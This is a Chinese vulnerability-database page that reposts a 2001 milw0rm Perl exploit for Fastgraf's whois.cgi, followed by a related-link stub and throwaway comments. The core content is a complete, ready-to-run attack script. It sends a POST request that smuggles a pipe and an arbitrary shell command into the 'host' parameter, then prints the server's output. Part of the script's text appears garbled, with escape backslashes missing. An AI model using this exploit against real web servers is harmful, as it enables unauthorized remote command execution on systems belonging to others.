Fastgraf’s whois.cgi – Remote Command Execution
漏洞ID | 1053512 | 漏洞类型 | |
发布时间 | 2001-01-12 | 更新时间 | 2001-01-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - [email protected] #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################
use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;
$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length
host=%7c$commandnn";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[<>/]//g;
if($output) {
print("$outputn");
} else { print "No data, or not vulnerablen";
}
}
close $sock;
# milw0rm.com [2001-01-12]
相关推荐: Serv-U FTP Directory Traversal Vulnerability
Serv-U FTP Directory Traversal Vulnerability 漏洞ID 1103630 漏洞类型 Input Validation Error 发布时间 2000-12-05 更新时间 2000-12-05 CVE编号 N/A CN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666